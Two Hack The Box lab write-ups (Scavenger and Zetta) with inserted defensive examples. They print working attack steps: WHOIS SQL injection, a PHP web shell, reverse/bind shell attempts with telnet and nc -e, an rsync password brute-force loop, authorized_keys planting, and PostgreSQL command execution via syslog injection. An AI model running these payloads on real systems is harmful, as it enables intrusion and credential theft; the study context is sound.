Hack The Box - Scavenger Writeup

System information



Initial scan

Nmap shows some services active and listening


Checking each daemon manually I can see that:

  • FTP is  vsFTPd 3.0.3
  • SMTP is ib01.supersechosting.htb ESMTP Exim 4.89
  • HTTP is an Apache 2.4.25 on Debian. The standard page shows a vhost config error: 

  • WHOIS is backed by a MariaDB database:


Opening the web page www.supersechosting.htb (one of the virtualhosts) I see this:


Nothing special on this page...

Initial foothold

As far as I know (maybe I'm dumb) there are no known vulnerabilities in the services, so my focus is on the WHOIS service backed by MariaDB, which might be vulnerable to SQL injection.
After some tries, the first successful SQL command I can run is a classic "UNION SELECT":

# whois  -h 10.10.10.155 "') UNION SELECT table_schema, table_name, 1 FROM information_schema.tables; "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb

1222 (21000): The used SELECT statements have a different number of columns

The server basically replies that I can run SQL statements, but the syntax is not OK (the number of columns is not correct).

# whois  -h 10.10.10.155 "') UNION SELECT  table_name,1 FROM information_schema.tables  -- ' "

The reply is:
ALL_PLUGINSAPPLICABLE_ROLESCHARACTER_SETSCOLLATIONSCOLLATION_CHARACTER_SET_APPLICABILITYCOLUMNSCOLUMN_PRIVILEGESENABLED_ROLESENGINESEVENTSFILESGLOBAL_STATUSGLOBAL_VARIABLESKEY_CACHESKEY_COLUMN_USAGEPARAMETERSPARTITIONSPLUGINSPROCESSLISTPROFILINGREFERENTIAL_CONSTRAINTSROUTINESSCHEMATASCHEMA_PRIVILEGESSESSION_STATUSSESSION_VARIABLESSTATISTICSSYSTEM_VARIABLESTABLESTABLESPACESTABLE_CONSTRAINTSTABLE_PRIVILEGESTRIGGERSUSER_PRIVILEGESVIEWSGEOMETRY_COLUMNSSPATIAL_REF_SYSCLIENT_STATISTICSINDEX_STATISTICSINNODB_SYS_DATAFILESTABLE_STATISTICSINNODB_SYS_TABLESTATSUSER_STATISTICSINNODB_SYS_INDEXESXTRADB_RSEGINNODB_CMP_PER_INDEXINNODB_TRXCHANGED_PAGE_BITMAPSINNODB_FT_BEING_DELETEDINNODB_LOCK_WAITSINNODB_LOCKSINNODB_TABLESPACES_ENCRYPTIONXTRADB_INTERNAL_HASH_TABLESINNODB_SYS_FIELDSINNODB_CMPMEM_RESETINNODB_CMPINNODB_FT_INDEX_TABLEINNODB_SYS_TABLESPACESINNODB_MUTEXESINNODB_BUFFER_PAGE_LRUINNODB_SYS_FOREIGN_COLSINNODB_CMP_RESETINNODB_BUFFER_POOL_STATSINNODB_FT_INDEX_CACHEINNODB_SYS_FOREIGNINNODB_METRICSINNODB_FT_DEFAULT_STOPWORDINNODB_CMPMEMINNODB_SYS_TABLESINNODB_SYS_COLUMNSINNODB_FT_CONFIGINNODB_BUFFER_PAGEINNODB_CMP_PER_INDEX_RESETXTRADB_READ_VIEWINNODB_SYS_SEMAPHORE_WAITSINNODB_CHANGED_PAGESINNODB_FT_DELETEDINNODB_TABLESPACES_SCRUBBINGcustomers

This means that there is a table named customers.
The next step is to find the names of the table's columns:
# whois  -h 10.10.10.155 "') UNION SELECT  column_name,1 FROM information_schema.columns where table_name='customers' -- ' "

% SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
% for more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
% This query returned 3 object

Iddomaindata

This means that the columns are id, domain and data.
That reveals the following domains:

  • supersechosting.htb
  • justanotherblog.htb
  • pwnhats.htb
  • rentahacker.htb
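The WHOIS lookup above behaves as if the queried name were pasted straight into the SQL text. As an added example (not the writeup's or the box's code), here is that pattern beside the parameterized form, run against an in-memory SQLite stand-in for the customers table; the table contents and the exact shape of the vulnerable query are assumptions, and the payload targets SQLite's sqlite_master catalog instead of information_schema.

```python
# Added example: string-built WHOIS query vs. a parameterized one.
# The customers table and its rows are constructed for the demo.
import sqlite3

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE customers (id INTEGER, domain TEXT, data TEXT)")
    con.executemany("INSERT INTO customers VALUES (?, ?, ?)",
                    [(1, "supersechosting.htb", "ns1"), (2, "pwnhats.htb", "shop")])
    return con

def whois_vulnerable(con, name):
    # Assumed shape of the vulnerable query: the name lands inside ('...'),
    # so a leading quote closes the literal and the rest is parsed as SQL.
    sql = "SELECT domain, data FROM customers WHERE domain IN ('%s')" % name
    return con.execute(sql).fetchall()

def whois_safe(con, name):
    # Same query with a bound parameter: the driver never treats input as SQL.
    sql = "SELECT domain, data FROM customers WHERE domain IN (?)"
    return con.execute(sql, (name,)).fetchall()

# The writeup's payload shape, retargeted at SQLite's catalog table.
PAYLOAD = "') UNION SELECT name, 1 FROM sqlite_master -- '"
```

With the concatenated query the payload returns catalog rows (the table name leaks); with the bound parameter it is just a domain that does not exist and the result is empty.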

After adding the domain mappings to my DNS I can open the websites in a web browser and find that:
  • www.supersechosting.htb looks like a plain HTML website
  • www.justanotherblog.htb has only an “under construction” logo
  • www.pwnhats.htb is an e-commerce site running PrestaShop on top of PHP, MySQL and phpMyAdmin
  • www.rentahacker.htb is a blog on WordPress 5.0


I tried to find some vulnerability or CVE but with no luck.
I then tried to run dirbuster on them with no valuable results.

So I turned to DNS service to find additional information, performing a zone transfer (AXFR):

The website http://sec03.rentahacker.htb shows a page with an image and some leet-speak text saying that the site was owned.

Running dirbuster I can find a login page of the Mantis bug tracker:
But it doesn't seem valuable or usable.
Dirbuster also shows other pages:
  • wiki.php
  • shell.php

The last one seems very interesting and its output is blank: maybe it accepts some parameters, but which ones?
Wfuzz can help to find them.
The syntax is wfuzz -w wordfile http://URL/FUZZ=sometext: wfuzz will substitute FUZZ with words from the wordfile.

In this case it picks words from the file common.txt and requests URLs like these:
  • http://sec03.rentahacker.htb/shell.php?admin=ls
  • http://sec03.rentahacker.htb/shell.php?cmd=ls
  • http://sec03.rentahacker.htb/shell.php?ftp=ls

The output is this one:

Here 200 is the HTTP response code and the 0s in the columns mean a reply with 0 lines, 0 words and 0 chars of output.

I let it run until I see a non zero output:

It corresponds to the parameter hidden.

The next step is to use this parameter by opening the URL http://sec03.rentahacker.htb/shell.php?hidden=ls
Now that I have found a way to execute commands, it's time to try some.

First of all a ping back to my computer... and it works!

Next a reverse connection to my computer (telnet 10.10.16.65 6666), but it doesn't work.


Next a bind shell with nc -lvp 6666 -e /bin/sh but it's not working either.

User Escalation (more than one)


So I believe it's time to look into the filesystems. First look is in /home and there are some folders:
  • ib01c01
  • ib01c02
  • ib01c03
  • ib01ftp
  • ib01wwwsupport
Looks like it will be a long journey if I have to escalate through more than one user...
The first look is in /home/ib01c03/www/ where I can find a wp-config.php, but the output is not helpful


I can encode it with base64 and copy/paste the content to my machine and decode it


Looks like there is an account:
  • Username: ib01c03
  • Password: Thi$sh1tIsN0tGut
Unfortunately it's not valid for SSH but it works with FTP.
Connecting to it, I can look into its home, but there is no valuable content....
Though there is something in /var/mail (which contains the user's mail):
So now I have an additional FTP account:

  • User ib01ftp
  • Pass: YghRt56_Ta
Connecting to FTP as user ib01ftp I can find two folders


In the first one there is a note.txt file, a pcap and a log file


The note.txt file gives a hint to look into the pcap file

Opening the pcap file with Wireshark I can filter the HTTP streams and look at the 20th TCP stream

So I believe we can find some juicy content in the pcap file

Looking into the TCP streams, I can find in “tcp.stream eq 20” a POST to an admin dashboard with username and password



Username: pwnhats@pwnhats.htb
Password:    GetYouAH4t!

Opening it with a web browser I can see that it is the admin dashboard of the PrestaShop e-commerce site

In another TCP flow I see that there is a specific POST call that uses the proxy settings in the IMAP section, which is prone to RCE.


The part in the red circle can be decoded as a reverse shell netcat:


This is confirmed on the scavenger machine 



The next step is to use Burp to replicate this POST request to execute commands like a ping back to my computer:


I can try to execute commands like netcat, but I think the connections are blocked, so I choose to upload a shell2.php file with a command like this one:
echo "<?php echo \"<pre>AAAA\"; \$cmd=(\$_REQUEST['cmd']); system(\$cmd);  ?>"  > shell2.php 

I encode it as base64, put it in Burp and use it:



I'm able to execute commands as user ib01c01 (please ignore the "AAAA" strings I added during debugging).

Next I can execute ls in the home folder and show the user.txt file which contains the user flag

The file access.txt contains credentials for user ib01c01 valid for FTP but not for SSH:
Connecting to FTP I can see the content of the home:

But the .ssh folder is not writable, so no way to put a SSH public key to get shell access...
Also the other folder doesn't contain anything valuable.

Just out of curiosity I can look at the startup iptables rules in /etc and see why the reverse shell is not working (basically only traffic on the ports of the listening services can flow in INPUT and OUTPUT):


Root Escalation

For this escalation I need to go back to the PCAP file.
Looking at the TCP streams from the end of the file, I can see that there are some encrypted communications on ports 4444 and 4445.
Just before this stream there is an HTTP (port 80) stream that can be filtered with "tcp.stream eq 20". It downloads a file root.c:

Looking at it and searching the Internet, it seems that this is a rootkit for Linux.
Basically, it is an LKM that creates a char device named /dev/ttyR0.
When a standard user sends a special string to this device, their shell gets elevated privileges.

In the original code the magic string is g0tR0ot

So a command like 
echo "g0tR0ot" > /dev/ttyR0; id
will run id command as root

In the case of Scavenger I run the command lsmod

It seems that the machine has the LKM loaded.
But the command above is not elevating privileges...

I believe that the LKM was compiled with a different magic string.
The compiled module (.ko file) can be found in “/home/ib01c01/…/” (note the space in front of the folder name) and can be downloaded with FTP.

With the objdump tool I can disassemble and look into the code.
In a section of the code I can find the instructions that define the magic value (the two movl below)


The magic word is defined by the hex string 67 33 74 50 72 31 76 which decoded to ASCII is g3tPr1v



So now using this string, I can execute id as root:

So it's only a matter of viewing the /root folder and disclosing the content of some files

Credits.txt contains information on the LKM


root.txt contains the root flag




Hack The Box - Zetta Writeup

MACHINE DATA

  • IP address: 10.10.10.156
  • OS: Linux
  • Rating: Hard
  • Points: 40
  • Phased out: Feb 21st 2020

Initial foothold and user 

Nmap reveals only the following services
  1. SSH
  2. FTP
  3. HTTP
Looking into the main webpage we can find two hints.

  • Any 32-character combination is a valid user and password for the FTP service: this doesn't lead to access to files or folders and the server doesn't seem to be vulnerable (PureFTPd)
  • The webpage mentions RFC 2428, which defines the FXP extension for the FTP protocol: maybe this FTP server supports FXP extensions
The feature described in RFC 2428 is related to IPv6, which combined with the FXP extension can lead to disclosure of the IPv6 address of the Zetta server.
I can connect to port 21 with telnet and type in any 32-character hex sequence as user and password

At the same time I can start a tcpdump session on my tun0 interface (the interface used by the VPN to hackthebox) which has an IPv6 address: dead:beef:4::100f


Now I can use the EPRT command (defined in RFC 2428) to tell the FTP server that my computer can be contacted on port 26000 for the FXP extensions.
Then I use a STOR pass.txt command to trigger this FXP extension.

The file pass.txt is not needed: I only need Zetta to contact my computer on port 26000 over IPv6 to find Zetta's IPv6 address:

And looking at tcpdump output:

I can find that the IPv6 address of Zetta is: dead:beef::250:56ff:febd:1dbe
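RFC 2428 EPRT carries `<d><net-prt><d><net-addr><d><tcp-port><d>` (net-prt 1 for IPv4, 2 for IPv6); a server that connects to whatever address the client names will open a data connection to a third party, which is exactly how the address above is learned. As an added example (not the writeup's code and not PureFTPd's), here is a parser for that argument and the server-side check that only accepts an address equal to the control-connection peer; the function names are mine.

```python
# Added example: parse an RFC 2428 EPRT argument and decide whether a server
# should honour it. Default policy: the data address must match the peer.
import ipaddress

def parse_eprt(arg):
    """Return (ip_version, address, port); raise ValueError if malformed."""
    if len(arg) < 4:
        raise ValueError("too short")
    d = arg[0]                                  # delimiter: any ASCII 33..126
    if not (33 <= ord(d) <= 126) or not arg.endswith(d):
        raise ValueError("bad delimiter")
    fields = arg[1:-1].split(d)
    if len(fields) != 3:
        raise ValueError("expected three fields")
    proto, addr, port = fields
    if proto not in ("1", "2"):
        raise ValueError("unsupported network protocol (reply 522)")
    ip = ipaddress.ip_address(addr)             # raises ValueError on junk
    if (proto == "1") != (ip.version == 4):
        raise ValueError("protocol number does not match address family")
    p = int(port)
    if not 0 < p < 65536:
        raise ValueError("port out of range")
    return ip.version, str(ip), p

def eprt_allowed(arg, peer_ip, allow_fxp=False):
    """Server policy: accept EPRT only when it points back at the peer,
    unless third-party (FXP) transfers are deliberately enabled."""
    _, addr, _ = parse_eprt(arg)
    return allow_fxp or ipaddress.ip_address(addr) == ipaddress.ip_address(peer_ip)

def rejects(arg):
    """True if parse_eprt refuses the argument (helper for checks)."""
    try:
        parse_eprt(arg)
        return False
    except ValueError:
        return True
```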

And the next step is to scan Zetta on IPv6:

There is an additional port that can be interesting.
I can connect to it and find that it is an rsync server used for backup purposes.

So now I can try to get a copy of /etc/ folder from remote server to my local computer:


rsync -6  rsync://root@[dead:beef:0:0:250:56ff:febd:1dbe]:8730/etc/* rsync/

Unfortunately the /etc/ folder doesn't reveal any secrets (shadow file or other things), but there is the rsync configuration file that has an interesting section:

[home_roy]
        path = /home/roy
        read only = no
        # Authenticate user for security reasons.
        uid = roy
        gid = roy
        auth users = roy
        secrets file = /etc/rsyncd.secrets
        # Hide home module so that no one tries to access it.

        list = false

There is a misconfiguration because the module is not read-only, so the user roy can use rsync to upload files
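An added example (not the writeup's or the box's code): a small audit of an rsyncd.conf that flags the conditions discussed here, writable modules, modules without auth users, and modules hidden with list = false. The sample config is the [home_roy] module from above plus a constructed [etc] module for contrast.

```python
# Added example: flag risky rsyncd.conf modules. rsync defaults assumed here:
# 'read only' defaults to yes and 'list' defaults to yes.
import configparser

SAMPLE = """\
[etc]
        path = /etc
        read only = yes
[home_roy]
        path = /home/roy
        read only = no
        # Authenticate user for security reasons.
        uid = roy
        gid = roy
        auth users = roy
        secrets file = /etc/rsyncd.secrets
        # Hide home module so that no one tries to access it.
        list = false
"""

def parse_rsyncd(text):
    # rsyncd.conf is INI-like: [module] sections with 'key = value' lines.
    cp = configparser.ConfigParser(interpolation=None, comment_prefixes=("#", ";"))
    cp.read_string(text)
    return cp

def is_no(value):
    return value.strip().lower() in ("no", "false", "0")

def audit(text):
    """Return {module: [findings]} for every module in the config text."""
    cp = parse_rsyncd(text)
    findings = {}
    for mod in cp.sections():
        sec = cp[mod]
        issues = []
        if is_no(sec.get("read only", "yes")):
            issues.append("writable: clients can upload into " + sec.get("path", "?"))
        if not sec.get("auth users"):
            issues.append("no 'auth users': anonymous access")
        if is_no(sec.get("list", "yes")):
            issues.append("hidden (list = false): obscurity is not a control")
        findings[mod] = issues
    return findings
```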

The first step is to get a copy of the folder, but I don't have the password of the roy user, so I have to bruteforce it with rockyou

for i in $(head -n 1000 rockyou.txt); do
     echo $i;
     echo $i| rsync -6 --password-file=- rsync://roy@[dead:beef:0:0:250:56ff:febd:871]:8730/home_roy/* roy ;
     if [ $? -eq 0 ];
     then
           echo password is $i
           exit 1
     fi
done

After a few minutes I got the password of roy, which is computer

Using rsync I can get a copy of roy home and I can find a .tudu.xml file in it which contains an obscure hint which will be useful later for root escalation:



I can leverage the write option to upload an authorized_keys file of my choice to use for SSH authentication:


root@NikITA:~/HTB/Zetta# rsync -6 -a authorized_keys   rsync://roy@[dead:beef::250:56ff:febd:871]:8730/home_roy/.ssh/
****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

You must have explicit, authorized permission to access this rsync
server. Unauthorized attempts and actions to access or use this
system may result in civil and/or criminal penalties.

All activities performed on this device are logged and monitored.

****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

@ZE::A staff

This rsync server is solely for access to the zetta master server.
The modules you see are either provided for "Backup access" or for
"Cloud sync".


Password:
root@NikITA:~/HTB/Zetta# ssh roy@10.10.10.156
Linux zetta 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64
Last login: Sat Aug 31 15:43:18 2019 from 10.10.14.2
roy@zetta:~$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
roy@zetta:~$ cat user.txt
a575bdb345f2de0a3172c8282452be91
roy@zetta:~$ 


That concludes user escalation for Zetta

Root escalation

Looking around as the roy user I found a git repo in the /etc/rsyslog.d folder: it contains the rsyslog config file, which has a special config to store log messages in a PostgreSQL database.
Here is the config:
template(name="sql-syslog" type="list" option.sql="on") {
  constant(value="INSERT INTO systemevents (message, devicereportedtime) values ('")
  property(name="msg")
  constant(value="','")
  property(name="timereported" dateformat="pgsql" date.inUTC="on")
  constant(value="')")
}

# load module
module(load="ompgsql")

# Only forward local7.info for testing.
local7.info action(type="ompgsql" server="localhost" user="postgres" pass="*******" db="Syslog" template="sql-syslog")

I believe that there is a way to exploit this by triggering a specially crafted syslog message
The exploitation requires some effort to find the correct message so I decide to reproduce the config on my machine and try many combinations until I find a way to execute code.

The basic idea here is to use the logger command with the correct facility to send a message with the correct quote and escaping characters to execute SQL commands in PostgreSQL.
For example I was able to get the version of PostgreSQL with this command:

echo "',NULL); SELECT version();-- " | logger -p local7.info

The version of PostgreSQL will be written in the table systemevents.
The reason for reproducing the setup on my machine is that I can look at the PostgreSQL content, while I don't have any credentials on Zetta for that.
Now that I can execute SQL commands I can leverage CVE-2019-9193 as stated on
PayloadsAllTheThings to execute Linux OS commands from inside PostgreSQL.

The original exploit is
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';


But I have to "encapsulate" it in the logger messages like this (please note the special \$$ sequence: the shell turns it into $$, PostgreSQL's dollar quoting, which stands in for the apostrophes that cannot be sent correctly through the message):
echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- "  | logger -p local7.info

echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ id \$$;-- "  | logger -p local7.info
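To see why the template above is injectable, here is an added example (not the writeup's code and not rsyslog's implementation) that renders the sql-syslog template by plain concatenation, renders it again with single quotes doubled as an SQL escaping step would, counts the resulting statements, and runs a small detector over constructed syslog lines for the injection shape used above.

```python
# Added example: template rendering with and without quote escaping, plus a
# detector for log messages carrying SQL fragments. LOGS is constructed.
import re

def render_concat(msg, ts):
    # The page's template, rendered as raw concatenation of its parts.
    return ("INSERT INTO systemevents (message, devicereportedtime) values ('"
            + msg + "','" + ts + "')")

def render_escaped(msg, ts):
    # Standard-SQL escaping: every ' inside a literal becomes '' so the
    # message can no longer close the literal and start a new statement.
    return render_concat(msg.replace("'", "''"), ts.replace("'", "''"))

def statement_count(sql):
    """Count ';'-separated statements, ignoring ';' inside single-quoted
    literals (a doubled '' toggles twice and so stays inside the literal)."""
    n, in_str = 1, False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
        elif ch == ";" and not in_str:
            n += 1
    return n

# Shapes seen in the writeup: closing the literal, SQL comments, COPY ... FROM
# PROGRAM and dollar quoting. Tune for your own local7 traffic before alerting.
INJECT_RE = re.compile(r"'\s*,\s*NULL\s*\)\s*;|;\s*--|FROM\s+PROGRAM|\$\$", re.I)

def suspicious(lines):
    """Return the syslog lines whose text looks like SQL smuggled in a message."""
    return [line for line in lines if INJECT_RE.search(line)]

LOGS = [  # constructed sample lines, not captured from the box
    "Aug 31 15:43:18 zetta sshd[812]: Accepted publickey for roy from 10.10.14.2",
    "Aug 31 15:44:02 zetta roy: ',NULL); SELECT version();-- ",
    "Aug 31 15:44:10 zetta roy: ',NULL); COPY cmd_exec FROM PROGRAM $$ id $$;-- ",
    "Aug 31 15:45:00 zetta cron[900]: (root) CMD (run-parts /etc/cron.hourly)",
]
```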

Once I'm able to execute commands, I can do anything, like listing the content of folders. With some ls commands I can find that postgresql has a private SSH key, and I can copy it to /tmp and make it world readable with these commands:

echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- "  | logger -p local7.info

echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- "  | logger -p local7.info

echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ cp /var/lib/postgresql/.ssh/id_rsa /tmp/a \$$;-- "  | logger -p local7.info


echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ chmod 777 /tmp/a \$$;-- "  | logger -p local7.info


The content of the id-rsa key is:

And I can use it to connect to zetta as postgres user:

Once inside as postgres user I can look at the history and I can find the command that originally created the postgres user as:


So the postgres user has a password: sup3rs3cur3p4ass@postgres

Remembering the hint in .tudu.xml file I can guess that the password of root user is sup3rs3cur3p4ass@root

And, yes it is: